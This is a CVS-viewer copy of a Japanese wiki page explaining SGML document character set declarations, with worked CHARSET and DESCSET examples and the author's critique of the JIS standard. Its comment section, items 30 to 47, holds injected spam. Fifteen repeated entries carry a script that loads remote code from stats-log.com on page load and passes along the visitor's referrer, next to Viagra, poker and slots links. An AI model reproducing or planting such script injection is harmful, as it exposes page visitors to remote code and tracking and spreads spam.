/[suikacvs]/test/sw/ids/0/176.txt
Suika

Contents of /test/sw/ids/0/176.txt

Parent Directory Parent Directory | Revision Log Revision Log


Revision 1.1 - (hide annotations) (download)
Mon Nov 10 10:54:10 2008 UTC (17 years, 1 month ago) by wakaba
Branch: MAIN
CVS Tags: HEAD
File MIME type: text/plain
converted from SuikaWiki3 <http://suika.fam.cx/gate/cvs/suikawiki/wikidata/page/CAB8BDF1CAB8BBFABDB8B9E7.txt>

1 wakaba 1.1
2     [1]
3    
4     [PRE[
5     :文書文字集合 (document character set):
6     [[SGML文書]]の中のすべての[[マーク]]及び[[データ]]に使用される[[文字集合]]。 [INS[([[JIS X 4151]]‐1992 3. (239))]]
7     - 備考 文書が[[システム]]間で交換される場合、
8     文字集合は受信側システムの文字集合に翻訳される。
9     ]PRE]
10    
11     [16] SGML 文書で使う文字集合は、
12     [[マーク文字]]と[[最小データ文字]]さえ表現できれば、
13     どんな文字集合でも使えます。 (参考3 7.1 参照。)
14    
15     [17] [[区切子機能]]をすべて最小データ文字から選んだとすると、
16     素の SGML では76文字、 Web SGML では
17     84文字が最小の文字集合となります。
18    
19     [30]
20     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
21     http://www.kleines-bierhaus.de/mb//267.shtml#1
22     [url=http://shrinkurl.us/1l0#3]free poker[/url]
23     [url]http://shrinkurl.us/ap1#4[/url]
24     ([[slots]] [d87s_test506@hotmail.com])
25    
26     [31]
27     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
28     http://www.kleines-bierhaus.de/mb//267.shtml#1
29     [url=http://shrinkurl.us/1l0#3]free poker[/url]
30     [url]http://shrinkurl.us/ap1#4[/url]
31     ([[slots]] [d87s_test506@hotmail.com])
32    
33     [32]
34     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
35     http://www.kleines-bierhaus.de/mb//267.shtml#1
36     [url=http://shrinkurl.us/1l0#3]free poker[/url]
37     [url]http://shrinkurl.us/ap1#4[/url]
38     ([[slots]] [d87s_test506@hotmail.com])
39    
40     [33]
41     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
42     http://www.kleines-bierhaus.de/mb//267.shtml#1
43     [url=http://shrinkurl.us/1l0#3]free poker[/url]
44     [url]http://shrinkurl.us/ap1#4[/url]
45     ([[slots]] [d87s_test506@hotmail.com])
46    
47     [34]
48     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
49     http://www.kleines-bierhaus.de/mb//267.shtml#1
50     [url=http://shrinkurl.us/1l0#3]free poker[/url]
51     [url]http://shrinkurl.us/ap1#4[/url]
52     ([[slots]] [d87s_test506@hotmail.com])
53    
54     [35]
55     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
56     http://www.kleines-bierhaus.de/mb//267.shtml#1
57     [url=http://shrinkurl.us/1l0#3]free poker[/url]
58     [url]http://shrinkurl.us/ap1#4[/url]
59     ([[slots]] [d87s_test506@hotmail.com])
60    
61     [36]
62     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
63     http://www.kleines-bierhaus.de/mb//267.shtml#1
64     [url=http://shrinkurl.us/1l0#3]free poker[/url]
65     [url]http://shrinkurl.us/ap1#4[/url]
66     ([[slots]] [d87s_test506@hotmail.com])
67    
68     [37]
69     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
70     http://www.kleines-bierhaus.de/mb//267.shtml#1
71     [url=http://shrinkurl.us/1l0#3]free poker[/url]
72     [url]http://shrinkurl.us/ap1#4[/url]
73     ([[slots]] [d87s_test506@hotmail.com])
74    
75     [38]
76     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
77     http://www.kleines-bierhaus.de/mb//267.shtml#1
78     [url=http://shrinkurl.us/1l0#3]free poker[/url]
79     [url]http://shrinkurl.us/ap1#4[/url]
80     ([[slots]] [d87s_test506@hotmail.com])
81    
82     [39]
83     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
84     http://www.kleines-bierhaus.de/mb//267.shtml#1
85     [url=http://shrinkurl.us/1l0#3]free poker[/url]
86     [url]http://shrinkurl.us/ap1#4[/url]
87     ([[slots]] [d87s_test506@hotmail.com])
88    
89     [40]
90     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
91     http://www.kleines-bierhaus.de/mb//267.shtml#1
92     [url=http://shrinkurl.us/1l0#3]free poker[/url]
93     [url]http://shrinkurl.us/ap1#4[/url]
94     ([[slots]] [d87s_test506@hotmail.com])
95    
96     [41]
97     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
98     http://www.kleines-bierhaus.de/mb//267.shtml#1
99     [url=http://shrinkurl.us/1l0#3]free poker[/url]
100     [url]http://shrinkurl.us/ap1#4[/url]
101     ([[slots]] [d87s_test506@hotmail.com])
102    
103     [42]
104     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
105     http://www.kleines-bierhaus.de/mb//267.shtml#1
106     [url=http://shrinkurl.us/1l0#3]free poker[/url]
107     [url]http://shrinkurl.us/ap1#4[/url]
108     ([[slots]] [d87s_test506@hotmail.com])
109    
110     [43]
111     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
112     http://www.kleines-bierhaus.de/mb//267.shtml#1
113     [url=http://shrinkurl.us/1l0#3]free poker[/url]
114     [url]http://shrinkurl.us/ap1#4[/url]
115     ([[slots]] [d87s_test506@hotmail.com])
116    
117     [44]
118     79hc63m-6xwagyj-tw6q669a-0 <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script> <a href="http://snipurl.com/1frps#2">viagra</a>
119     http://www.kleines-bierhaus.de/mb//267.shtml#1
120     [url=http://shrinkurl.us/1l0#3]free poker[/url]
121     [url]http://shrinkurl.us/ap1#4[/url]
122     ([[slots]] [d87s_test506@hotmail.com])
123    
124     [45]
125     GLv1Dj <a href="http://wdaexucadrlb.com/">wdaexucadrlb</a>, [url=http://dklpmiltqlvd.com/]dklpmiltqlvd[/url], [link=http://tjwlnkzmqkou.com/]tjwlnkzmqkou[/link], http://bfyjulkejssp.com/
126     ([[evyvzqjinao]] [kxladn@uvzjzj.com] [WEAK[2008-06-01 10:16:23 +00:00]])
127    
128     [46]
129     GLv1Dj <a href="http://wdaexucadrlb.com/">wdaexucadrlb</a>, [url=http://dklpmiltqlvd.com/]dklpmiltqlvd[/url], [link=http://tjwlnkzmqkou.com/]tjwlnkzmqkou[/link], http://bfyjulkejssp.com/
130     ([[evyvzqjinao]] [kxladn@uvzjzj.com] [WEAK[2008-06-01 10:16:37 +00:00]])
131    
132    
133     [47]
134     SmEBLE <a href="http://ynbrfuyjzywl.com/">ynbrfuyjzywl</a>, [url=http://eoxkfkvahixx.com/]eoxkfkvahixx[/url], [link=http://gdtfbarsusbt.com/]gdtfbarsusbt[/link], http://mwkznxgglhck.com/
135     ([[shrnyoxq]] [qlchlc@izyotg.com] [WEAK[2008-06-05 07:44:44 +00:00]])
136    
137    
138     [[#comment]]
139    
140    
141     * SGML 宣言による文書文字集合の記述
142    
143     [2] 仕様書: JIS X 4151‐1992 12.1 文書文字集合
144    
145     SGML の引数の書式と [[ABNF]]
146     を合体させたような擬似マーク宣言断片で構文を表すと:
147     [PRE[
148     -- 文書文字集合 (172) --
149     CHARSET
150     1*( -- 文字集合記述 (173) --
151     BASESET "Public Identifier"
152     DESCSET
153     1*( -- 文字記述 (176)--
154     先頭文字番号 文字個数 (
155     基本文字集合番号
156     / 最小表記
157     / UNUSED
158     )
159     -- SGML 側の -- -- 文字集合側 --
160     -- 文字番号 -- -- の文字番号 --
161     )
162     )
163     ]PRE]
164    
165     - [25] 文書文字集合記述には、[[重要なSGML文字]]それぞれの固有の[[ビット組合せ]]の[[符号化表現]]を含めておかなければなりません。
166     (JIS 12.1)
167     -- [26] 文書に二つの[[具象構文]]を使う場合には、
168     両方の[[マーク文字]]すべてが重要文字になります。 (JIS 12.1 備考)
169    
170     [3] [[公開識別子]]は、
171     基本文字集合を人間が識別するためのものだそうです。 (12.1.1.1)
172     規格名、 [[ISO-IR]] 登録番号、
173     [[標号]]などの想定読者が理解できるだろうものを識別子に入れることになっています。
174     [WEAK[(機械処理はするとしても ISO-IR + ]]
175     実装者が知ってる識別子までが限界でしょう。)]]
176    
177     [[公式公開識別子]]を使う時は、[[公開文種別]]は
178     [CODE(SGML)[[[CHARSET]]]] とします。 (JIS 12.1.1.1)
179    
180     [4]
181     - 基本文字集合番号が指定してある場合は、
182     (SGML 側の) 先頭文字番号から文字個数分の文字は、
183     (真の文字集合側の) 基本文字集合番号から文字個数個分に対応する意味を持ちます。
184     文字集合側で意味を持たないときには、
185     対応する SGML 側の文字も意味を持たないことになります。
186     - 最小表記が指定してある場合は、
187     その指定された文字の意味を持ちます。
188     最小表記は[[旧IRV]] なので、それと同じ意味を持つことになります。
189     最小表記による指定は、基本文字集合番号による指定ができない場合に限ることが推奨されています。
190     - [CODE(SGML)[UNUSED]] が指定してある場合は、
191     その文字は意味を持ちません。
192     - この[CODE(ABNF)[文字集合区分]]は、
193     文字集合のすべての文字番号を、重複なく記述していなければなりません。
194     (JIS 12.1.1)
195    
196     [29]
197     意味を持たない文字は、
198     [[非SGML文字]]として、[[文字種別]]
199     [CODE(SGML)[[[NONSGML]]]] に加えられます。
200     (ってことは、基本文字集合の「意味を持たない文字」
201     を処理系は知っていないといけないってことです。
202     [WEAK[それじゃあ「意味を持たない」とはどういう意味か、その定義はないみたいですが、 [CODE(SGML)[UNUSED]] から類推すれば、文字が割り当てられていない[[符号位置]]のことを言うのでしょう。]])
203    
204     なお、重要文字でない[[回避文字]]も非 SGML 文字になります。
205    
206     [[#comment]]
207    
208    
209     ** 使用例
210    
211     [6] 文書文字集合・[[構文参照文字集合]]の定義の例を。
212    
213     [[#comment]]
214    
215    
216     *** 単純な一面の文字集合
217    
218     [13] [[規格参照具象構文]]の構文参照文字集合 (表7) :
219     [PRE[
220     BASESET "ISO 646-1983//CHARSET
221     International Reference Version
222     (IRV)//ESC 2/5 4/0"
223     DESCSET 0 128 0
224     ]PRE]
225    
226     [14] 文句の付け所がないくらい単純。
227    
228     [15] [CODE(char)[[[ESC]] 2/5 4/0]] は任意の
229     128文字の集合を意味します。
230     ([CODE(WikiPage)[[[公開文指示シーケンス]]]]参照。)
231     [CODE(char)[ESC 2/8 4/0]] でないのは、基本集合が単なる
232     [[ISO-IR]] 002 の94文字の図形文字集合ではなく、旧 IRV の
233     128文字の符号化文字集合全体を意味するためだと思われます。
234    
235     [[#comment]]
236    
237    
238     *** 旧 IRV と右半分に +α の8ビット文字集合
239    
240     [7] JIS X 4151‐1992 表8 の例 :
241     [PRE[
242     CHARSET -- 8ビット文書文字集合 --
243     -- 最初の128文字は、構文参照文字集合と同じである。 --
244     BASESET "ISO 646-1983//CHARSET
245     International Reference Version
246     (IRV)//ESC 2/5 4/0"
247     DESCSET 0 9 UNUSED
248     9 2 9
249     11 2 UNUSED
250     13 1 13
251     14 18 UNUSED
252     32 95 32
253     127 1 UNUSED
254     BASESET "ISO Registration Number 109//CHARSET
255     ECMA-94 Right Part of Latin Alphabet
256     Nr.3//ESC 2/9 4/3"
257     DESCSET 128 32 UNUSED
258     160 5 32
259     165 1 "SGML User's Group logo"
260     166 88 38 -- NONSGML に対する5個の
261     unused を含む --
262     254 1 127 -- 127 の未使用位置に動かす --
263     255 1 UNUSED -- 255 は、回避文字とする --
264     ]PRE]
265    
266     IRV:1983 は、
267     ,"上\\下" ,0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15
268     ,0 ,C0 ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
269     ,1 ,C0 ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
270     ,2 ,SP ,! ,__&&quot&&__ ,# ,Cur ,% ,& ,' ,( ,) ,* ,+ ,"," ,- ,. ,/
271     ,3 ,0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,: ,; ,< ,= ,> ,?
272     ,4 ,@ ,A ,B ,C ,D ,E ,F ,G ,H ,I ,J ,K ,L ,M ,N ,O
273     ,5 ,P ,Q ,R ,S ,T ,U ,V ,W ,X ,Y ,Z ,[ ,"\\" ,] ,^ ,_
274     ,6 ,` ,a ,b ,c ,d ,e ,f ,g ,h ,i ,j ,k ,l ,m ,n ,o
275     ,7 ,p ,q ,r ,s ,t ,u ,v ,w ,x ,y ,z ,{ ,| ,} ,~ ,DEL
276    
277     [[ISO-IR109]] (指示は [CODE(char)[[[ESC]] 2/13 4/3]] が正しい。) は、
278     ,"上\\下" ,0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15
279     ,0 ,** ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
280     ,1 ,** ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
281     ,2 ,NBSP ,LL ,DC ,£ ,Cur ,** ,LL ,§ ,¨ ,I ,LL ,LL ,LL ,SHY ,** ,LL
282     ,3 ,° ,ll ,^2 ,^3 ,´ ,μ ,ll ,・ ,"," ,i ,ll ,ll ,ll ,1/2 ,** ,ll
283     ,4 ,A` ,A' ,A^ ,** ,"A\"" ,LL ,LL ,LL ,LL ,LL ,LL ,LL ,LL ,LL ,LL ,LL
284     ,5 ,** ,"N\"" ,O` ,O' ,O^ ,LL ,LL ,LL ,LL ,× ,LL ,LL ,LL ,LL ,LL ,LL
285     ,6 ,a` ,a' ,a^ ,** ,"a\"" ,ll ,ll ,ll ,ll ,ll ,ll ,ll ,ll ,ll ,ll ,ll
286     ,7 ,** ,"n\"" ,o` ,o' ,o^ ,ll ,ll ,ll ,ll ,÷ ,ll ,ll ,ll ,ll ,ll ,上点
287    
288     ([CODE[LL]] は大文字, [CODE[ll]] は小文字。)
289    
290     それが、この文書文字集合では、
291     ,"上\\下" ,0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15
292     ,0 ,× ,== ,== ,== ,== ,== ,== ,== ,== ,[09] ,[0A] ,× ,== ,[0D] ,× ,==
293     ,1 ,× ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
294     ,2 ,[20]
295     ,3 ,
296     ,4 ,
297     ,5 ,
298     ,6 ,
299     ,7 , , , , , , , , , , , , , , ,[7E] ,×
300     ,8 ,× ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
301     ,9 ,× ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,==
302     ,10 ,{20} , , , ,{24} ,☆ ,{26} , , , , , , ,{2D} ,<2E> ,{2F}
303     ,11 ,{30} , , , , , , , , , , , , ,{3D} ,<3E> ,{3F}
304     ,12 ,{40} ,{41} ,{42} ,<43> ,{44} ,
305     ,13 ,<51> ,{52} ,
306     ,14 ,{60} ,{61} ,{62} ,<63> ,{64} ,
307     ,15 ,<70> ,{71} ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,== ,{7F} ,×
308    
309     - [CODE[ [ [VAR[hh]] ] ]] は IRV に対応
310     - [CODE[{[VAR[hh]]}]] は IR 109 に対応
311     - [CODE[<[VAR[hh]]>]] は IR 109 に対応するが、文字未割当
312     - [CODE[☆]]は「SGML User's Group logo」
313     - [CODE[×]]は未使用
314    
315     [8] 注釈に5個の unused を含むとあるけど実際には6個含んでいるし、[Q[127 の未使用位置に動かす]]という注釈の意図も不明。
316     もしかして規格の著者は今の IR 109 とは違う表を見ていたんだろうか?
317     [WEAK[昔の情報が少ない状態なら、なんかの間違いが起こり得なくもない。]]
318     IR 109 の指示シーケンスも間違ってるし。
319    
320     [9] 文字番号の代わりの引数表記、おいおい、
321     複数文字でもいいのかいと突っ込みたくなりますが、
322     確かに駄目とはかかれてません。。。そんな。。。
323    
324     [SAMP(SGML)["A"]] とあったら [CODE(char)[LATIN CAPITAL LETTER A]] です、という意味なのかと思ってたけど
325     (規格本文はそうとしか読めないよ)、
326     こっちの使い方が正しいんでしょうかね?
327     よくわかんない。。。
328    
329     [[#comment]]
330    
331    
332     *** EUC 型の8ビット多バイト符号
333    
334     [10] JIS の表9にある例です。
335     なお、 「EUC 型」という見出しにしましたが、
336     7ビット部が新 IRV でないので EUC ではありません。
337    
338     [11]
339     [PRE[
340     CHARSET -- 8ビット文書文字集合 --
341     -- 最初の128文字は、構文参照文字集合と同じである。 --
342     BASESET "ISO 646-1983//CHARSET
343     International Reference Version
344     (IRV)//ESC 2/5 4/0"
345     DESCSET 0 9 UNUSED
346     9 2 9
347     11 2 UNUSED
348     13 1 13
349     14 18 UNUSED
350     32 95 32
351     127 1 UNUSED
352     BASESET "ISO Registration Number 87//CHARSET
353     JIS X 0208//ESC 2/6 4/0 ESC 2/4 2/9 4/2"
354     -- JIS X 0208 の文字を G1 集合に指示し、
355     列 10‐15 に呼び出す。 --
356     DESCSET 128 41249 UNUSED
357     41377 94 8481 -- 2121 --
358     41471 162 UNUSED
359     41633 14 8737 -- 2221 --
360     41647 11 UNUSED
361     [INS[(略)]]
362     62625 6 29371 -- 7421 --
363     62631 2905 UNUSED
364     ]PRE]
365    
366     [12] [[ISO/IEC2022]] 的に文字でない範囲や
367     [[JISX0208]]‐1990 で文字が割り当てられていない範囲を
368     [CODE(SGML)[UNUSED]] にするために涙ぐましい努力がなされています。。。
369    
370     実際には、文字が割り当てられていない位置は実装が知っていれば
371     SGML 宣言に明示する必要はないと思うので、
372     大雑把にどばっと割り当てておいても間違いではないのではないでしょうか。
373     [WEAK[もちろん、明示しておいた方が親切ですし、具体的な文字集合についての知識がない処理系でも正しい扱いが期待できるから良いのですが。。。]]
374    
375     [18] 注釈には JIS X 0208
376     を[[右]]に呼び出すみたいなことが書かれていますが、
377     [[呼び出し]]のシーケンスはどこにも載ってません。。。
378     [[指示]]しかできません。
379    
380     [[#comment]]
381    
382    
383     *** 指示・呼出しのあるもの
384    
385     [19] [[多符号基本具象構文]] (参考5図1) より :
386     [PRE[
387     BASESET "ISO 646-1983//CHARSET
388     International Reference Version
389     (IRV)//ESC 2/5 4/0"
390     DESCSET 0 14 0
391     14 1 "LS0 in ISO 2022"
392     15 1 "LS1 in ISO 2022"
393     16 112 16
394     128 14 UNUSED
395     142 1 "SS2 in ISO 2022"
396     143 1 "SS3 in ISO 2022"
397     144 112 UNUSED
398     ]PRE]
399    
400     [20] 投げやりな定義ですね。。。
401     [CODE(char)[[[SS2]]]]・[CODE(char)[[[SS3]]]] のために [[CR]]
402     を使ってるけど、 [[GR]]
403     は未使用なので適当なものを指示・呼び出しして使えないじゃないですか。
404    
405     もっとも、そもそも文字集合の指定なのに[[符号拡張]]が混じって、
406     つじつまが合わなくなる
407     (例えば [CODE(char)[0x30]] が
408     [CODE(char)[DIGIT ZERO]] に対応するという記述の意味がない)
409     のに [CODE(SGML)[[[MSOCHAR]]]] とか [CODE(SGML)[[[MSICHAR]]]]
410     とかわけのわからんものを導入して誤魔化そうとしているのがいけないんです。
411    
412     本来 SGML 処理系を通す前にシステム文字集合にでも統一しておくとか、
413     あるいは符号拡張を考慮した文字集合記述ができるかじゃないといけないのに、
414     何も考えてないからこんなことになる。
415    
416     [21] よく見ると多符号具象構文では1バイトの呼び出しは使えるけど、
417     指示や2バイト以上使う呼び出しは使えないじゃん。。。
418     (たまたまうまく使える場合を除いて。)
419    
420     [22] >>20-21 それをどう誤魔化すかの解説が参考6 3.1 というわけだ。
421     だけどこんなことやってる人ほんとにいるんかな? ISO/IEC 2022
422     も一応考えました。というポーズにしかみえない。
423    
424     [[#comment]]
425    
426    
427     *** UCS の第0面〜第16面
428    
429     [23] Web SGML 附属書 L で XML
430     用の文書文字集合宣言例として出ているもの :
431     [PRE[
432     BASESET
433     "ISO Registration Number 176//CHARSET
434     ISO/IEC 10646-1:1993 UCS-4 with implementation
435     level 3//ESC 2/5 2/15 4/6"
436     DESCSET
437     0 9 UNUSED
438     9 2 9
439     11 2 UNUSED
440     13 1 13
441     14 18 UNUSED
442     32 95 32
443     127 1 UNUSED
444     128 32 UNUSED
445     160 55136 160
446     55296 2048 UNUSED -- surrogates --
447     57344 8190 57344
448     65534 2 UNUSED -- FFFE and FFFF --
449     65536 1048576 65536
450     ]PRE]
451    
452     同じく、構文参照文字集合として使われているもの :
453     [PRE[
454     BASESET "ISO Registration Number 176//CHARSET
455     ISO/IEC 10646-1:1993 UCS-4 with implementation
456     level 3//ESC 2/5 2/15 4/6"
457     DESCSET
458     0 1114112 0
459     ]PRE]
460    
461     [24] どうも、文書文字集合の範囲が XML 1.0
462     仕様書 ([CODE(ABNF)[[[Char]]]] 参照。)
463     とは食い違っている気がしますが・・・気にしないことにしましょう。
464    
465     [[#comment]]
466    
467    
468     * Boot Strap
469    
470     [26] [[SGML宣言]]で文書文字集合が規定されていたとしても、
471     受け取った側のシステムがその文書を読めるとは限りません。
472     SGML 宣言すらも読めないかもしれません。
473    
474     JIS 12.1 備考によれば、文書を機械処理にかける前に、
475     [[システム文字集合]]に変換しておくのは、文書受領者の責任です。
476     そして、そのための情報交換には二つの方法があるとされています。
477    
478     - 外部プロトコルによる情報伝達 — 非電子的手段も含む
479     - SGML 宣言を人間可読形式で渡す
480    
481     [27] 文書を新しい文字集合に変換する時には、
482     SGML 宣言の文書文字集合記述引数の文字番号や、
483     [[文字参照]]の文字番号を変更しなければなりません。
484     (JIS 12.1) このほかにも、
485     文書中のすべての文字番号が変更の対象となるはずです。
486    
487     しかし >>26 の状況でシステム文字集合に変換する時にこの修正は大変そうです。
488     (似たような文書文字集合ならよいですが、
489     全然違っていたら、文書中の文字参照を探し回らなければならないのです。
490     SGML 解析器に通す前ですし、
491     一括置換だと文字データ区間内などでも書き変えてしまう虞があります。)
492    
493     理論上はともかく、
494     実際にはまったく異なる文書文字集合など使わないであろうから、
495     と思いたいところですが、 [[EBCDIC]] などが使われていたらと考えると。
496     文字番号専用の文字集合を指定できるようにしてあればこの問題は回避できそうです。
497    
498     [[#comment]]
499    
500    
501     * memo

admin@suikawiki.org
ViewVC Help
Powered by ViewVC 1.1.24